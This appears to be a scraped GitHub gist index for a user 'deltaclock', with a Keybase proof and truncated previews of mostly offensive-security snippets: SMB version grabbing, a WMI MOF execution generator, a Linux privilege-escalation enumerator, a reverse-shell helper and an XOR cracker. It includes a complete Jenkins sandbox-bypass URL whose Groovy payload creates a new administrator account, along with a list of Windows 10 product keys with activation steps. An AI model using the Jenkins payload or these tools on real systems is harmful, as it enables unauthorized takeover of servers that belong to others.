I hereby claim:
- I am deltaclock on github.
- I am deltaclock (https://keybase.io/deltaclock) on keybase.
- I have a public key ASAET_tdk_aaIO7AM6R8vM9_pQBzZsPdEt9QbEdxyqXK1wo
To claim this, I am signing this object:
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdbool.h> | |
| #include <string.h> | |
| #define ARRAYSIZE(x) (sizeof(x) / sizeof(*x)) | |
| #define FUSE_IMAGE_SIZE 0x400 | |
| #define ROM_BASE 0x100000 |
| #!/bin/sh | |
| #Author: rewardone | |
| #Description: | |
| # Requires root or enough permissions to use tcpdump | |
| # Will listen for the first 7 packets of a null login | |
| # and grab the SMB Version | |
| #Notes: | |
| # Will sometimes not capture or will print multiple | |
| # lines. May need to run a second time for success. | |
| if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi |
| http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
| from random import randint | |
| from re import sub | |
| def genMof(mofName, exe): | |
| classname = str(randint(0, 9999)) | |
| mof = """#pragma namespace("\\\\\\\\.\\\\root\\\\cimv2") | |
| class MyClass{class} | |
| { | |
| [key] string Name; |
| #!/bin/bash | |
| #A script to enumerate local information from a Linux host | |
| version="version 0.95" | |
| #@rebootuser | |
| thorough=true | |
| #help function | |
| usage () | |
| { | |
| echo -e "\n\e[00;31m#########################################################\e[00m" | |
| echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" |
| $run = "calc.exe" | |
| start-process $run |
| 1. Open CMD as Administrator | |
| 2. Paste the following commands into the Cmd: One by one, follow the order. | |
| cscript slmgr.vbs /ipk "SERIAL NUMBER HERE" | |
| Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type. | |
| Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 | |
| Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR | |
| Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH |
I hereby claim:
To claim this, I am signing this object:
| #!/usr/bin/env python | |
| frequencies = {'a': 0.0651738, 'b': 0.0124248, 'c': 0.0217339, 'd': 0.0349835, 'e': 0.1041442, 'f': 0.0197881, 'g': 0.0158610, 'h': 0.0492888, 'i': 0.0558094, 'j': 0.0009033, 'k': 0.0050529, 'l': 0.0331490, 'm': 0.0202124, | |
| 'n': 0.0564513, 'o': 0.0596302, 'p': 0.0137645, 'q': 0.0008606, 'r': 0.0497563, 's': 0.0515760, 't': 0.0729357, 'u': 0.0225134, 'v': 0.0082903, 'w': 0.0171272, 'x': 0.0013692, 'y': 0.0145984, 'z': 0.0007836, ' ': 0.1918182} | |
| def single_byte_xor(b, s): | |
| """ Performs XOR of the single byte against every character in string. """ | |
| assert len(b) == 1 | |
| x = ord(b) |
| #!/bin/bash | |
| shellType=$1 | |
| port=$2 | |
| ip=$(ip a show tun0 2>/dev/null| grep -oPm1 '(([\d.]).*)\/') | |
| ip=${ip::-1} | |
| if [[ $? != 0 ]]; then | |
| echo "No vpn idiot.." | |
| exit | |
| fi |